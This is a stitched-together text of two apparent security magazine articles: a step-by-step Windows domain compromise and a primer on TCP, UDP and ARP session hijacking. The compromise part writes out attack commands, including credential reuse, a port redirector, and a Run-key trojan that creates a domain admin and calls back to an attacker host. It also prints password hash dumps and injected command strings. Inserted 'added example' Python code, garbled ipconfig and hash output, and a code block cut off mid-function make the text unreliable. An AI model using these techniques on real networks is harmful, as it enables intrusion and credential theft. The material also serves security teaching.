Platform ID: 500
Comment:

Server Flags:
Workstation
Server
Dial-in Server

GetSystemInfo is a very simple tool that merely connects to the system and asks for information in the HKLM\Software\Microsoft\Windows NT\CurrentVersion key. From this you see that the system is called PYN-WEB. I still don't know exactly how to hack this box, but I'll try one more thing:


C:\warez>serviceuser \\PYN-WEB 
IDS PYN-DMZ\_ids 


I almost have the info I need because the Web server is also running the IDS service under the same account. That's all I need to try the _ids account:


C:\warez>net use \\172.17.0.1\c$ /u:pyn-dmz\_ids idsPasswd!
The command completed successfully.


As you can see, I have successfully taken over the Web server! Now my objective changes to taking over the domain itself and in turn getting to the corporate domain from there.


Owning the Domain

So far I own the database server and the Web server (everything except the domain controller in fact). But what have I really gained with the Web server? To find out, I need to start by uploading my tools to it and getting a remote command shell on that system just like I did on the database server. It is just a bit simpler now that I have an administrative SMB connection to the Web server. SMB allows easy access to the Web server. For example, I can now schedule a command or launch some form of portable remote command shell. Once I have a local shell, I can use all the normal tools that I know and love. For example, I can easily find out who all the local administrators are. There are not many accounts here, as you can see in Figure 10. I only see the service account I've already found, the local administrator, and the domain admins. That probably means that when they need to administer the system, they use a domain administrator account. This means it might be possible to use a Trojan horse program to make one of those users take over the domain for us. Generally speaking, an attacker would rather use a direct attack, since they produce faster results. If all else fails, however, I will resort to a passive attack to accomplish my goal. You may have noticed by now that I have not seen so much as a dialog box. Can't I do some GUI hacking for a change? Sure. There are some tricks to it, though.


Figure 10 Find Local Admin

C:\warez>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

Administrator
PYN-DMZ\_ids
PYN-DMZ\Domain Admins
The command completed successfully.


Figure 11 Ipconfig Output for PYN-DMZ-DC

C:\warez>ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : PYN-DMZ-DC
Primary Dns Suffix  . . . . . . . : PYN-DMZ.LOCAL
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter CorpNet:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) #2
Physical Address. . . . . . . . . : 00-03-FF-06-3E-F0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10216
Subnet Mask . . . . . . . . . . . : FOES 2GE 2550
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : TROLL

Ethernet adapter DMZNet:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic)
Physical Address. . . . . . . . . : 00-03-FF-07-3E-F0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 172.17.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.17.0.1
DNS Servers . . . . . . . . . . . : UZ


Recall that there were only two ports open on the firewall, 80 and 443. Since nothing was listening on port 443 on the Web server, I can establish a listener on that port without disrupting operations and risking tipping off the legitimate administrators. Rebinding terminal services to use that port would be highly noticeable.

Windows Terminal Services (using Remote Desktop Protocol) listens on port 3389. A portscan of the database server reveals that 3389 is indeed open:

C:\warez>portscan 172.17.0.3
Port 172.17.0.3:135 open
Port 172.17.0.3:139 open
Port 172.17.0.3:445 open
Port 172.17.0.3:1433 open
Port 172.17.0.3:3389 open

I can't establish a direct connection to the database server; for one thing, it's on a NAT'd network and is not directly accessible from the Internet. I can get there by putting a port redirector on the Web server. A port redirector takes traffic coming in on one port and directs it to another host on another port. In other words, I'll set up a port redirector on the Web server which will take incoming traffic on port 443 and send it to the SQL server on port 3389:

C:\warez>socketpipe 443 88 3389 172.17.0.3




With that socket open, all I do is establish a Web server connection using Terminal Services Client:

mstsc /v:192.168.2.30:443

Now that I can log on with my _ids user account, I have the full power of a graphical user interface (which some would argue is somewhat less than the full power of a command line, but no matter).

Even with the GUI, I have not yet taken over the DC. I'm going to use a Trojan horse to take it over. To do so, I use a really evil custom tool. First, I'll register it on the Web server (172.17.0.1) over my terminal services connection:

c:\warez>EvilTrojan -r 172.17.0.1 -a 192.168.2.112

The tool registers itself in the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, and therefore runs every time a user logs on. If that user is a domain admin, it creates a new user account on the domain and then adds that account to the domain admins group. If it's able to do so, it opens up the Messenger service and sends an administrative alert to the attacker (192.168.2.112 in our case). Lastly, it removes itself from the Run key to hide its tracks. All this happens while the administrator is logging on, and therefore is completely transparent to the administrator. In the end, the only thing left on the system to indicate that anything happened is a file called avcheck.exe that is located in the Windows directory.

Obviously, some other backchannel notification can be used. In the real world, attackers often use Internet Relay Chat (IRC). Even a really subtle HTTP transaction can serve as notification. Now all I have to do is to wait for a domain administrator to log on. Once an administrator logs on, I get a handy success notification:

C:\>nc -l -p 80
Succeeded in adding a user.
User: attacker$
Password: "UareQwn3d!"
Domain: PYN-DMZ
DC: PYN-DMZ-DC

The notification can be received any way I want. This particular Trojan simply opens a socket to port 80 on the attacker's host and sends the notification to it. Notifications could be encrypted, encoded, come over just about any port or protocol, and altered in a myriad of ways. For instance, notifications to an IRC chat channel are quite common.

Figure 12 Pwdump2 Output

C:\warez>pwdump2.exe

Administrator:500:624aac413795cdcl ff17365faflffe89 : b9e0cfceaf6d077970306a2fd88a7c0a::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0: : : 
krbtgt :502:aad3b435b51404eeaad3b435b51404ee : 28237 c666e4bb3cc96d670cadcal593b::: 
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee: cd072175763b0d5b3fbb152F57b96e7c::: 
FAjenstat:1106:daf058ae79085db217306d272a9441bb:c43325fdf7/cafacf02f6e3eaa7f5020::: 
AAlberts:1107:1df8f06dcf78bb3aaad3b435p51404ee : 2408F92ab284046ddcc6952755f449e2: : 
HAcevedo: 1108: dbff4b96d021df2f93e28745b8bf4ba6 : bbd9477810308a0b676F3cda91F10539::: 
MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2c67b571425751747e7ae379fefedfcc::: 
KAkers:1110:693de7320aae76293e28745b8bf4ba6 : fb853a32ccd2b92b43639b0e7d29e09d: : : 
TAdams :1111:ea03148efb24d7 fc5be30f58d2a941d5: 18cce97ee181d42be654133658723813::: 
KAbercrombie:1112:6c32f38de08f49026f8092a33daaf05:a88b78471261477e26d9e4c11571b127::: 
Sculp:1113:49901659efc5eld6aad3b435b51404ee: d986300c7c0c33d3cc5417dbac6f90db: : : 
SAbbas :1114:d6855d70abc371c2b77b4e7109416ab8: 363c93e6be7a5cb00le7ad542c292F26::: 

At this point, the DMZ domain has fallen and I have taken over the domain controller. Remember, this is the keeper of the keys to the kingdom and contains the user accounts database, among other things. In order to make use of this newfound power, I once again make the DC connect to me so I can get a remote shell. Once I do, I continue learning more about where I am, as is shown in Figure 11.

This system is not only dual-homed, but it is dual-homed on the corporate network and the DMZ, which means it must be acting as the router between the two. Before I take advantage of that fact, I can dump out all the user accounts on the domain controller. Recall that earlier I learned that there were about 15 user accounts on the DC? Well, cycles are wasting, so I'd better dump out the password hashes and get to work cracking them. Since I have administrative privileges, doing so is a simple matter of running the very popular PWDump tool (see Figure 12).

By default, Windows stores two different password representations: the LM "hash" (which is not a hash at all: the password is uppercased, padded to 14 characters and split into two 7-character halves, and each half is used as a DES key to encrypt a fixed string) and the Windows NT hash. From this output, I can tell that this system stores the LM hashes. This is good news for a criminal hacker since LM hashes are so much easier to crack: each half is attacked on its own, case is lost, and a second half equal to the well-known constant aad3b435b51404ee gives away that the password is seven characters or fewer. Feeding this output into my favorite password cracker, I can crack most of the passwords on this system within 24 hours. In fact, in less than a minute, I've cracked three of them using a hybrid attack. A real attacker may crack passwords even faster. Tools are available that trade off storage space for cracking speed (precomputed tables of LM hashes), greatly decreasing crack time.
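To make that weakness concrete, here is an added Python example (not from the article or its tools) that triages a pwdump-style dump the way an attacker, or a defender auditing their own domain, would before starting a cracker: it parses the user:rid:lm:nt::: lines, flags empty passwords, accounts with no LM hash, accounts whose second LM half is the empty constant (password of seven characters or fewer), and accounts that share an NT hash and therefore a password. The sample dump is constructed; apart from the two documented empty-value constants, its hex strings are placeholders, not real hashes.

```python
"""Triage a pwdump-style dump: which accounts are cheap to crack, and which share a password.

Added example, not part of the original article; the sample dump below is constructed."""
import re
from collections import defaultdict

# Well-known constants, not secrets: the LM "hash" of an empty 7-byte half and the
# NT hash of the empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump layout: user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):"
)

def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples; blank, prompt or garbled lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return rows

def classify(lm, nt):
    """Findings for one account, read off the hashes alone, before any cracking."""
    findings = []
    if nt == EMPTY_NT:
        findings.append("empty password")
    if lm == EMPTY_LM:
        findings.append("no LM hash stored (password over 14 characters, or LM storage disabled)")
    else:
        # LM: uppercased password, padded to 14, split into two 7-byte DES keys that each
        # encrypt a fixed string; each half cracks on its own and case is lost.
        findings.append("LM hash present: each 7-character half cracks independently")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or fewer (second LM half is the empty constant)")
    return findings

def triage(text):
    """Map each user to its findings and list users whose NT hashes coincide (same password)."""
    rows = parse_pwdump(text)
    report = {user: classify(lm, nt) for user, _, lm, nt in rows}
    by_nt = defaultdict(list)
    for user, _, _, nt in rows:
        by_nt[nt].append(user)
    shared = {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT}
    return report, shared

# Constructed sample in pwdump layout. The hex values are placeholders, not real hashes,
# except for the documented empty-password constants.
SAMPLE_DUMP = """
C:\\warez>pwdump2.exe
Administrator:500:0123456789abcdeffedcba9876543210:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FAjenstat:1106:0123456789abcdefaad3b435b51404ee:22222222222222222222222222222222:::
AAlberts:1107:0123456789abcdefaad3b435b51404ee:22222222222222222222222222222222:::
Sculp:1113:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""

if __name__ == "__main__":
    report, shared = triage(SAMPLE_DUMP)
    for user, findings in report.items():
        print(f"{user}: {'; '.join(findings)}")
    for nt, users in shared.items():
        print(f"same password on {', '.join(users)} (NT hash {nt[:8]}...)")
```

Shared NT hashes are the part worth a defender's attention: one cracked password opens every account in the group, and when the same people hold accounts in two domains it is also how a dump from the DMZ opens the corporate network.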

Now that I have the passwords, I need to find out more about where to use them. First, I know which systems are available on the 172.17.0/24 network, so let's see what I can find on the 10.1.2/24 net:

C:\warez>discoverHosts 10.1.2
Reply from 10.1.2.16: bytes=32 time<1ms TTL=128
Reply from 10.1.2.17: bytes=32 time=54ms TTL=128
16 is the datacenter DC as we've already learned, but 17 is a new host that we have not seen before. Let's see if I can get some more information on it:

C:\warez>GetSystemInfo 10.1.2.17
Server info on 10.1.2.17
Name:        PYN-CORPDC
Domain:      PYN
Version:     5.2
Platform ID: 500
Comment:
Server Flags:
    Workstation
    Server
    Domain Controller
    Time source


17 is the domain controller I was looking for originally. I can tell that it is running Windows Server 2003, but not much else about it. Perhaps dumping out the users will give me additional information, like that shown in Figure 13.

As you can see, this system has a lot of users. Listed are several old friends who also had accounts on the DMZ DC. In fact, there are several whose passwords I have already cracked on the DMZ. At this juncture, I could either try to gather more information, or I could just be bold and try those accounts. Three guesses which of those options a hacker would use:

C:\warez>net use \\pyn-corpdc\c$ /u:pyn\GAlderson "yosemiTe*"
The command completed successfully.


This network has now been thoroughly hacked. I could go on and do whatever I came for, but from here on, it is mostly up to what the attacker wants to do. Potential options would be to scavenge the network for data, steal confidential information, add himself to the payroll, use the network to attack some other network such as a business partner, and so on. The attacker has complete and unrestricted access to the entire contoso.com network. Note what made the last step possible: the same people had accounts, with the same passwords, in both the DMZ domain and the corporate domain, so a hash dumped from the lower-trust domain was enough to walk into the higher-trust one.

Figure 13 Corp DC Dumpinfo

C:\warez>dumpinfo 10.1.2.17
The Administrator is: PYN\Administrator

Users on PYN-CORPDC:
RID 1000 PYN\HelpServicesGroup an Alias
RID 1001 PYN\SUPPORT_388945a0 a User
RID 1002 PYN\TelnetClients an Alias
RID 1003 PYN\PYN-CORPDC$ a User
RID 1104 PYN\FAjenstat a User
RID 1105 PYN\AAlberts a User
RID 1106 PYN\HAcevedo a User
RID 1107 PYN\MAlexander a User
RID 1108 PYN\KAkers a User
RID 1109 PYN\TAdams a User
RID 1110 PYN\KAbercrombie a User
RID 1111 PYN\Sculp a User
RID 1112 PYN\SAbbas a User
RID 1113 PYN\MATTen a User
RID 1114 PYN\JAdams a User
RID 1115 PYN\SAlexander a User
RID 1116 PYN\HAbolrous a User
RID 1117 PYN\PAckerman a User
RID 1118 PYN\GAlderson a User

Share     Type     Comment
IPC$      Unknown  Remote IPC
NETLOGON  Disk     Logon server share
ADMIN$    Special  Remote Admin
SYSVOL    Disk     Logon server share
C$        Special  Default share

Administrators:
Unable to enumerate administrators
ERROR: Access Denied


Conclusion

In this article, I've examined how a Windows-based network might be hacked. I hasten to point out that Windows-based networks are no less secure than any other network. While the specific attacks used in this article are unique to Windows, minor modifications to the techniques and a new tool set would make the same compromise possible on a network running a different platform. The problem is not the platform itself, but the practices. All platforms are securable, but all networks are exploitable if they are not architected and implemented carefully. Poor implementation is always poor implementation, regardless of the underlying platform.




Kevin Lam, David LeBlanc, and Ben Smith

Hacking: Fight Back

Theft On The Web: Prevent Session Hijacking

AT A GLANCE
"How does this work?"
• TCP hijacking mechanics
• ACK packet storms
• UDP attacks
• Network attack prevention

Kevin Lam, David LeBlanc, and Ben Smith all work on Security at Microsoft. Ben is the coauthor of Microsoft Windows Security Resource Kit and David is the coauthor of Writing Secure Code 2 (both from Microsoft Press). This article is adapted from Chapter 21 of Assessing Network Security (Microsoft Press, 2004).

When computers need to talk to each other, they simply do so. But how do you know that your computer is really talking to the computer it thinks it's talking to? How do you know that an attacker has not taken over the session between the computers and is passively monitoring the conversation, or even changing it? You would certainly know it, belatedly, if the order for 1,000 widgets that you sent to a business partner was received as an order for 100,000 widgets. This can happen, courtesy of a well-timed strike by an intruder.

Right now, you might be asking: "Is my network susceptible to this?" "What can I do to prevent this from happening?"

Session hijacking works by taking advantage of the fact that most communications are protected (by providing credentials) at session setup, but not thereafter. These attacks generally fall into three categories: man-in-the-middle (MITM), blind hijack, and session theft.

In MITM attacks, an attacker intercepts all communications between two hosts. With communications between a client and server now flowing through the attacker, he or she is free to modify their content. Protocols that rely on the exchange of public keys to protect communications, and do not authenticate those keys, are the classic target of these types of attacks.


In blind hijacking, an attacker injects data such as malicious commands into intercepted communications between two hosts, commands like "net.exe localgroup administrators /add EvilAttacker". This is called blind hijacking because the attacker can only inject data into the communications stream; he or she cannot see the response to that data (such as "The command completed successfully"). Essentially, the blind hijack attacker is shooting data in the dark, but as you will see shortly, this method of hijacking is still very effective.

In a session theft attack, the attacker neither intercepts nor injects data into existing communications between two hosts. Instead, the attacker creates new sessions or uses old ones. This type of session hijacking is most common at the application level, especially Web applications.

Session hijacking at the network level is especially attractive to attackers. They do not need host access, as they do with host-level session hijacking. Nor do they need to customize attacks on a per-application basis, as they do at the application level. Network-level session hijacking attacks allow attackers to remotely take over sessions, usually undetected. But successfully hijacking a session at the network level requires an attacker to overcome various obstacles, as you will see in the next few sections.


Hijacking a TCP Session

One of the key features of TCP is reliability and ordered delivery of packets. To accomplish this, TCP uses acknowledgment (ACK) packets and sequence numbers. Manipulating these is the basis for TCP session hijacking. As we mentioned earlier, the MITM attacker simply needs to be positioned so that communications between the client and the server are relayed through him or her. To understand how an attacker might sneak into the TCP session in a blind session hijack attack, you need to look at what happens when a client initiates a TCP session with the server.

As shown in Figure 1, the client first initiates a session with the server by sending a synchronization (SYN) packet to the server with initial sequence number x. The server responds with a SYN/ACK packet that contains the server's own sequence number p and an ACK number for the client's original SYN packet. This ACK number indicates the next sequence number the server expects from the client. In our example, this is x+1, because the client's original SYN packet counted as a single byte. The client acknowledges receipt of the SYN/ACK packet by sending back to the server an ACK packet with the next sequence number it expects from the server, which in this case is p+1 (the server's initial SYN packet sequence number plus one). The client and server are ready to start exchanging data.


The sequence number values just described are important for understanding how to successfully hijack this session later, so pay close attention to them in the paragraphs that follow. The same goes for ACK numbers, which are key to understanding TCP ACK storms.

For now, observe what happens to these sequence numbers when the client starts sending data to the server (see Figure 2). In order to keep the example simple, the client sends the character A in a single packet to the server.

The client sends the server the single character in a data packet with the sequence number x+1. The server acknowledges this packet by sending back to the client an ACK packet with number x+2 (x+1, plus 1 byte for the A character) as the next sequence number expected by the server. Enter the attacker. If the attacker wanted to inject data into the TCP session as the client, he or she would need to:

• Spoof the client's IP address
• Determine the correct sequence number that is expected by the server from the client
• Inject data into the session before the client sends its next packet

The first and second tasks are easily accomplished (easily, that is, for an attacker who can sniff the session; an attacker off the path has to guess a 32-bit number that modern stacks randomize), but the third is a bit trickier. Tricky, but not impossible. Essentially, the attacker needs a way to prevent the client from sending into the session new data that would shift sequence numbers forward. To do this, the attacker could just send the data to inject and hope it is received before the real client can send new data, as shown in Figure 3. Or, he or she could perform a denial of service (DoS) attack on the client, or perhaps some tricks that use address resolution protocol (ARP) spoofing.

Here is how this might play out. The attacker sends a single Z character to the server with sequence number x+2. The server accepts it and sends the real client an ACK packet with acknowledgment number x+3 to confirm that it has received the Z character. When the client receives the ACK packet, it will be confused, either because it did not send any data or because the next expected sequence is incorrect. (Maybe the attacker sent something "nice" like "mv * which emacs* /vmunix && shutdown -r now" and not just a single character.) As you will see later, this confusion can cause a TCP ACK storm, which can disrupt a network. In any case, the attacker has now successfully hijacked this session.

Attackers can automate the session hijacking process just described with tools such as Juggernaut, by Mike Schiffman, and Hunt, by Pavel Krauz.

Figure 1 TCP Three-Way Handshake
Client -> Server: SYN, Sequence Number X
Server -> Client: SYN/ACK, Sequence Number P, Acknowledgment Number X+1
Client -> Server: ACK, Acknowledgment Number P+1

Figure 2 Sending Data over TCP
Client -> Server: Data "A", Sequence Number X+1
Server -> Client: Acknowledgment Number X+2

Figure 3 Blind Injection
Attacker -> Server (spoofed as Client): Data "Z", Sequence Number X+2
Server -> Client: Acknowledgment Number X+3


Hijacking a UDP Session

Hijacking a session over the User Datagram Protocol (UDP) is exactly the same as over TCP, except that UDP attackers do not have to worry about the overhead of managing sequence numbers and other TCP mechanisms. Since UDP is connectionless, injecting data into a session without being detected is extremely easy. Figure 4 shows how an attacker could do this. What the attacker still has to get right is whatever identifier the application layer uses to match replies to requests (in DNS, the 16-bit transaction ID and the source port), and the forged reply has to arrive before the genuine one.

DNS queries, online games like the Quake series and Half-Life, and peer-to-peer sessions are common protocols that work over UDP; all are popular targets for this kind of session hijacking.


Determining Susceptibility

One obvious way to determine the susceptibility of your organization's networks to network-level session hijacking attacks is to try to hijack actual network sessions using common attacker tools such as Juggernaut or Hunt. Using live attacker tools against your organization's production networks, however, is not recommended. A safer approach would be simply to find out if your organization uses transport protocols that do not use cryptographic protection (such as encryption) for transport security or digital signatures for authentication verification. Common examples of these protocols include Telnet, FTP, and DNS. If such network protocols exist in your organization's networks, sessions traveling over those unencrypted protocols are ripe for hijacking.

Figure 4 Session Hijacking over UDP
Client -> Server: UDP Request
Attacker -> Client: forges a reply before the server replies


What countermeasures can you take to reduce your susceptibility to network-level session hijacking attacks? One technique is to implement encrypted transport protocols such as Secure Shell (SSH), Secure Sockets Layer (SSL), and Internet Protocol Security (IPSec). An attacker attempting to hijack a session by tunneling in an encrypted transport protocol must, at a minimum, know the session key used to protect that tunnel, which should be difficult to guess or steal. Any data the attacker can inject into network sessions without using the correct session key will be undecipherable by the recipient and rejected accordingly. Even in the unlikely event that an attacker is able to attain the prized session key, digitally signing network traffic provides an extra layer of defense against the successful injection of malicious data into network sessions. The tunnel is only as good as the authentication that set it up: a client that accepts an unverified SSL certificate or an unknown SSH host key without question may be talking to the attacker's end of the tunnel from the start.

As a rule, do not communicate with highly critical systems unless you do so over protocols that use a strong encryption algorithm for secure transport. By themselves, protocols such as Telnet and FTP are poor choices, extremely susceptible to hijacking when not protected inside encrypted tunnels.


Tricks and Techniques

Successfully hijacking a network session depends on a few conditions falling into place, so an attacker has several tricks and techniques for creating these conditions. For instance, to conduct a true MITM attack, the attacker must get hosts to route traffic through him or her. To make this happen, he or she can use tricks with Internet Control Message Protocol (ICMP) Redirect packets or ARP spoofing.

As you read through the attack strategies discussed here, keep in mind that many can be easily defeated by the countermeasures for network-level session hijacking. TCP ACK storms, for example, are not possible when the attacker cannot inject data into a session. Routing table modifications also quickly become a wasted effort for an attacker if they cannot interpret or modify data that gets routed through them. It is still useful and interesting, however, to know what your enemy has in his or her bag of tricks. Some common items include TCP ACK packet storms, ARP table modifications, TCP resynchronizations, and remote modifications of routing tables.


TCP ACK Packet Storms

If an attacker is not careful when hijacking TCP sessions in your organization's networks, those networks can be disrupted by TCP ACK packet storms.

To understand this threat, look at what happens when an attacker hijacks a TCP session from the TCP protocol's point of view. Assume that the attacker has forged the correct packet information (headers, sequence numbers, and so on) at some point during the session. When the attacker sends injected session data to the server, the server will acknowledge the receipt of the data by sending an ACK packet to the real client. This packet will most likely contain a sequence number that the client is not expecting, so when the client receives this packet, it will try to resynchronize the TCP session with the server by sending it an ACK packet with the sequence number that it is expecting. This ACK packet will in turn contain a sequence number that the server is not expecting, and so the server will resend its last ACK packet. This cycle goes on and on, and this rapid passing back and forth of ACK packets creates an ACK storm, as shown in Figure 5.

As the attacker injects more and more data, the size of the ACK storm increases and can quickly degrade network performance. If neither the attacker nor the client explicitly closes the session, the storm will likely stop itself eventually when ACK packets are lost in the storm. For a defender, the storm has a recognizable shape: a burst of payload-free ACK segments flying back and forth between one client/server pair, with neither side's acknowledgment number ever advancing.

Figure 5 ACK Storm
1. Attacker injects data into session
2. Server acknowledges data with ACK packet to client
3. Confused client sends its last ACK to try to resynchronize
Steps 2 and 3 repeat over and over
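The sequence arithmetic of Figures 1 through 3 and the ACK storm of Figure 5, carried through in an added Python model (not part of the article; the initial sequence numbers and host names are made up). It tracks each side's send and expect counters through the handshake, the client's "A" and the attacker's spoofed "Z", then replays the ACK exchange that follows the desync and shows that it never settles on its own; it also reports the byte gap the client would have to close to be back in step.

```python
"""Sequence and ACK bookkeeping for a TCP session, a blind injection into it, and the ACK
storm that follows. Added example, not from the article; numbers x and p are made up."""
from dataclasses import dataclass

@dataclass
class Endpoint:
    name: str
    snd_nxt: int = 0   # next sequence number this side will send
    rcv_nxt: int = 0   # next sequence number this side expects from its peer

def handshake(client, server, x, p):
    """Three-way handshake with client ISN x and server ISN p (Figure 1)."""
    client.snd_nxt = x + 1      # the SYN consumes one sequence number
    server.rcv_nxt = x + 1      # server's SYN/ACK carries ack x+1
    server.snd_nxt = p + 1
    client.rcv_nxt = p + 1      # client's ACK carries ack p+1

def deliver(receiver, seq, payload):
    """Receiver accepts an in-order segment and returns the ACK number it replies with.
    Anything else is dropped (no reassembly modelled) and the current ACK is repeated."""
    if seq == receiver.rcv_nxt:
        receiver.rcv_nxt += len(payload)
    return receiver.rcv_nxt

def send(sender, receiver, payload):
    """Legitimate send: uses and then advances the sender's own sequence counter (Figure 2)."""
    ack = deliver(receiver, sender.snd_nxt, payload)
    sender.snd_nxt += len(payload)
    return ack

def inject(spoofed_seq, receiver, payload):
    """Blind injection (Figure 3): a spoofed segment carrying the number the receiver expects.
    The real client's counters are untouched, so the two sides fall out of step."""
    return deliver(receiver, spoofed_seq, payload)

def bytes_to_resync(client, server):
    """How far the client lags the server's expectation: the number of bytes the client
    would have to send before its sequence numbers lined up with the server's again."""
    return server.rcv_nxt - client.snd_nxt

def ack_storm(client, server, max_rounds=5):
    """The ACK exchange after a desync. The server ACKs bytes it received from the attacker;
    the client never sent those bytes, so it answers with its own ACK, which tells the server
    nothing new, so the server ACKs again. Nothing converges, hence the cap, which stands in
    for the packet loss that ends a real storm. Returns (transcript, in_sync)."""
    transcript = []
    for _ in range(max_rounds):
        transcript.append((server.name, "ACK", server.rcv_nxt))
        if server.rcv_nxt <= client.snd_nxt:
            return transcript, True          # ACK covers only bytes the client sent: no storm
        transcript.append((client.name, "ACK", client.rcv_nxt))
    return transcript, False

def figure_3_scenario(x=1000, p=5000):
    """Handshake, the client's 'A', then the attacker's 'Z' in the slot the client would use next."""
    client, server = Endpoint("client"), Endpoint("server")
    handshake(client, server, x, p)
    ack_a = send(client, server, b"A")             # server replies ack x+2
    ack_z = inject(client.snd_nxt, server, b"Z")   # attacker uses x+2; server replies ack x+3
    return client, server, ack_a, ack_z

if __name__ == "__main__":
    c, s, ack_a, ack_z = figure_3_scenario()
    print("server ACK after 'A':", ack_a, " after injected 'Z':", ack_z)
    print("client will send seq", c.snd_nxt, "but server expects", s.rcv_nxt,
          "-> gap of", bytes_to_resync(c, s), "byte(s)")
    for who, kind, num in ack_storm(c, s)[0]:
        print(f"  {who}: {kind} {num}")
```

Injecting with any sequence number other than the one the server expects is simply dropped by the model, which is the second task from the list above in miniature: without the right number the attacker achieves nothing, with it the client and server disagree from that segment on.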


ARP Table Modifications

The address resolution protocol is used by each host on an IP network to map local IP addresses to hardware addresses or MAC addresses. Here is a quick look at how this protocol works.

Say that Host A (IP address 192.168.1.100) wants to send data to Host B (IP address 192.168.1.250). No prior communications have occurred between Hosts A and B, so the ARP table entries for Host B on Host A are empty. As shown in Figure 6, Host A broadcasts an ARP request packet indicating that the owner of the IP address 192.168.1.250 should respond to Host A at 192.168.1.100 with its MAC address. The broadcast packet is sent to every machine in the network segment, and only the true owner of the IP address 192.168.1.250 should respond. (As you will see shortly, this is not always the case.) All other hosts discard this request packet, but Host A receives an ARP reply packet from Host B indicating that its MAC address is BB:BB:BB:BB:BB:BB. Host A updates its ARP table, and can now send data to Host B.

Can you see the security problem here? Does Host A know that Host B really did send the ARP reply? The answer is no, and attackers take advantage of this. In our example, attackers could spoof an ARP reply to Host A before Host B responded, indicating that the hardware address E0:E0:E0:E0:E0:E0 corresponds to Host B's IP address, as shown in Figure 7. Host A would then send any traffic intended for Host B to the attacker, and the attacker could choose to forward that data (probably after some tampering) to Host B.

Figure 6 Finding the Owner of a MAC Address
Host A (IP 192.168.1.100, MAC AA:AA:AA:AA:AA:AA), Host B (IP 192.168.1.250, MAC BB:BB:BB:BB:BB:BB), Host C (IP 192.168.1.50, MAC CC:CC:CC:CC:CC:CC)
1. Host A broadcasts ARP request asking which MAC address belongs to "192.168.1.250"
2. Host B responds with an ARP reply and indicates its MAC address is BB:BB:BB:BB:BB:BB
3. Host C ignores Host A's ARP request

Figure 7 Spoofed Reply
Host A (IP 192.168.1.100, MAC AA:AA:AA:AA:AA:AA), Host B (IP 192.168.1.250, MAC BB:BB:BB:BB:BB:BB) and Attacker (IP 192.168.1.1, MAC E0:E0:E0:E0:E0:E0), connected through a switch
1. Host A broadcasts ARP request asking which MAC address belongs to "192.168.1.250"
2. Attacker forges a response before Host B can respond
3. Host A begins sending data intended for Host B to the attacker
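An added Python model (not the article's; the addresses are those of Figures 6 through 8) of the ARP cache behaviour just described: the default cache, which believes every reply, the race of Figure 7, and two defenses, refusing unsolicited replies and pinning a static entry. The model's point is that refusing unsolicited replies stops re-poisoning and the nonexistent-MAC trick of Figure 8, but does not undo a race the attacker has already won; only a pinned entry (or inspection on the switch) does.

```python
"""ARP cache behaviour under spoofed replies: the trusting default versus two defenses.
Added example, not the article's code; addresses follow Figures 6 through 8."""

class ArpCache:
    def __init__(self, accept_unsolicited=True):
        self.table = {}            # ip -> mac, learned dynamically
        self.pending = set()       # ips this host has actually asked about
        self.static = {}           # pinned ip -> mac entries, never overwritten
        self.accept_unsolicited = accept_unsolicited
        self.alerts = []           # what an arpwatch-style monitor would log

    def request(self, ip):
        """Broadcast 'who has ip?' and remember that we asked."""
        self.pending.add(ip)

    def reply(self, ip, mac):
        """Handle an ARP reply claiming ip is at mac. Returns True if the table changed."""
        if ip in self.static:
            if self.static[ip] != mac:
                self.alerts.append(f"reply for pinned {ip} claims {mac}, expected {self.static[ip]}")
            return False
        if ip not in self.pending and not self.accept_unsolicited:
            self.alerts.append(f"unsolicited reply {ip} -> {mac} ignored")
            return False
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(f"{ip} changed from {old} to {mac}")
        self.table[ip] = mac
        self.pending.discard(ip)
        return True

    def resolve(self, ip):
        return self.static.get(ip, self.table.get(ip))

HOST_B_IP = "192.168.1.250"
HOST_B = "BB:BB:BB:BB:BB:BB"
ATTACKER = "E0:E0:E0:E0:E0:E0"
BOGUS = "C0:C0:C0:C0:C0:C0"   # the nonexistent address used to sink traffic

def figure_7(accept_unsolicited=True):
    """Host A asks for Host B; the attacker answers first, Host B second, the attacker again.
    Returns the cache and what Host A resolved after each reply."""
    a = ArpCache(accept_unsolicited)
    a.request(HOST_B_IP)
    seen = []
    a.reply(HOST_B_IP, ATTACKER); seen.append(a.resolve(HOST_B_IP))   # forged reply wins the race
    a.reply(HOST_B_IP, HOST_B);   seen.append(a.resolve(HOST_B_IP))   # genuine reply, now unsolicited
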